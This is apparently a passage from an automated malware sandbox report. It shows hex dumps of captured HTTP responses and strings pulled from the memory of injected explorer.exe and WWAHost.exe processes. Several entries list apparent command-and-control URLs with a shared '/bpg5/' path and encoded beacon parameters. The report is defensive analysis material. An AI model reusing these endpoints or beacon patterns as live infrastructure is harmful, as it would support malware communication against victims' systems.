dd cc dc dc dc dd cc dc dc ec e7 bf 89 b2 b0 7a cb a9 73 ac 4e c9 d7 9f e1 4f 27 21 e9 e1 cb a7 df c8 a7 af 3f 1f 29 89 be fe 7c a2 15 71 c2 23 29 4a 5a 7d f9 74 ae f6 ee f6 13 ff 9a 92 13 fd f2 e9 39 a6 2f 79 56 54 9f 9c 30 4b 2b 9a 56 5f 3e bd c4 51 75 fc 12 d1 e7 38 a4 2e fe 65 ea c4 69 5c c5 24 71 cb 90 24 f4 8b 3f f3 a6 8e e8 e9 ee e3 ea 4b 98 3d d3 42 85 5c d0 3d 2d 0a 5a 48 90 d3 cc 15 5f dd 97 23 4d dd 28 7b 49 0f 05 89 a8 da 75 9f 15 27 52 b9 11 ad 68 58 c5 59 2a 81 a8 68 42 f3 63 96 d2 2f 69 f6 e9 eb cf 49 9c 7e 73 0a 9a 7c f9 94 17 34 cc d2 94 86 95 13 a5 a5 9b 03 a2 2a 3c 7e 72 8e 05 dd 7f f9 f4 f9 f3 cb cb cb ec 90 65 87 84 56 e4 70 22 29 39 d0 62 16 66 a7 6b a1 b8 24 25 c9 5b 15 87 e5 70 28 e4 37 f2 ca 89 21 79 7c 05 80 30 4a 7f 2b 67 61 92 9d a3 7d 42 0a 3a 9c 84 9c 1c 28 89 e6 9c 8a f2 2d 8d e2 90 00 b3 87 83 62 5c 25 51 39 3b cc a2 ec bc 4b 68 98 c4 e1 b7 59 4a ab 61 cc ad f2 f0 16 f4 90 68 1c 19 28 29 65 45 aa 38 1c ce 8c b0 a4 7c 0c c3 fb ee b3 b4 2a af 47 cd bb a3 8c 5f 29 56 a7 72 f6 c7 33 49 ab 92 16 cf 57 08 55 49 c3 73 41 67 87 82 3c 93 8a 5c b1 bc c2 28 9d c9 b2 58 bd c4 a7 c3 70 46 02 98 df ca 88 26 f1 73 31 5c 0c e3 13 39 d0 d2 dd d3 59 59 26 2e ff 1b 39 91 df af 59 1c 61 76 ca 13 8a 0b eb 5a 10 a7 d9 89 46 31 71 af ed 1f cf 4e 59 79 8c 4f d9 70 46 92 53 32 7b 26 c9 99 86 d9 e9 44 8b f0 0a 99 88 48 12 de 00 c6 ee 32 8c 24 23 d1 27 87 94 5f 3e c1 4a f8 e4 c0 e9 c8 fe fb f3 4b b6 df 8b a3 e0 58 55 79 f0 f9 73 51 ad d7 d9 e9 04 3c f9 fc 92 bb fc f8 fb 5c 1d e9 89 96 9f c3 2c cc b2 d4 3d 91 b2 a2 c5 e7 17 ba c3 c5 f5 39 0e b3 53 96 a5 9f 95 bf cd 18 f4 b0 c8 ca 32 2b e2 43 9c 6a 07 d3 05 c2 e6 b7 a0 0c 28 22 2f b4 cc 4e 94 53 27 7d 71 f9 00 90 d2 f9 3f 7c fe b2 9c 6d 66 de 27 47 21 b9 8a ab 84 7e 5d 7a 4b e7 5f fe ab 7f eb fc 93 7f f5 ef fe e5 3f 76 fe 93 f3 6f b2 73 45 9d f5 da c9 52 e7 5f bc 39 ff 22 4e a3 9f 3f b3 a6 4c bb 40 3d e2 c7 22 db 65 55 f9 63 ad 45 fc 78 22 af 6c e9 c0 51 0c ba 42 90 90 e2 40 7f fc cc d5 8f bc c8 72 5a 54 6f 5f 3e 65 87 00 66 4a d6 40 e8 ae 8c ab 5a 29 50 9a 46 b4 0c 8b 38 d7 d4 82 7f 12 a7 11 50 58 53 fb ef 8f a4 72 fe 63 76 76 fe cf ac ac fe 46 a8 17 2a 52 18 af 84 55 1d b9 f3 9f 1c db d8 ad 90 ce 45 22 c1 01 f9 2a 35 01 5b 7a Data Ascii: 98c
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 May 2023 09:37:18 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Fri, 05 Oct 2018 09:13:39 GMTETag: W/"afe-57777afe91410"Content-Encoding: gzipData Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 May 2023 09:37:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Fri, 05 Oct 2018 09:13:39 GMTETag: W/"afe-57777afe91410"Content-Encoding: gzipData Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 May 2023 09:37:24 GMTContent-Type: text/htmlContent-Length: 2814Connection: closeVary: Accept-EncodingLast-Modified: Fri, 05 Oct 2018 09:13:39 GMTETag: "afe-57777afe91410"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 May 2023 09:52:52 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 May 2023 09:52:54 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 25 May 2023 09:52:57 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: explorer.exe, 00000003.00000002.833320353.00007FF883839000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groov
          Source: explorer.exe, 00000003.00000002.833320353.00007FF883839000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://components.groove.net/Groove/Components/SystemComponents/SystemComponents.osd?Package=net.gro
          Source: WWAHost.exe, 00000004.00000002.820630497.0000000008380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupctionSettings
          Source: explorer.exe, 00000003.00000002.828968378.0000000017200000.00000004.80000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.819975180.0000000004E90000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://rt66omm.com/bpg5/?lpw7=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVf
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.42230.org
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.42230.org/bpg5/
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.42230.org/bpg5/www.42230.orgUZCu=zJfEuRXw-P
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.42230.orgI
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.antalyabfe.com
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.antalyabfe.com/bpg5/
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.antalyabfe.com/bpg5/www.antalyabfe.comUZCu=zJfEuRXw-P
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.berlinhealthweek.com
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.berlinhealthweek.com/bpg5/
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.berlinhealthweek.com/bpg5/www.berlinhealthweek.comUZCu=zJfEuRXw-P
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bisarropainting.com
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bisarropainting.com/bpg5/
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bisarropainting.com/bpg5/www.bisarropainting.comUZCu=zJfEuRXw-P
          Source: explorer.exe, 00000003.00000003.673642852.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.806264142.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.675487608.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.825427681.000000000849B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.805284481.000000000849B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bisarropainting.comAD
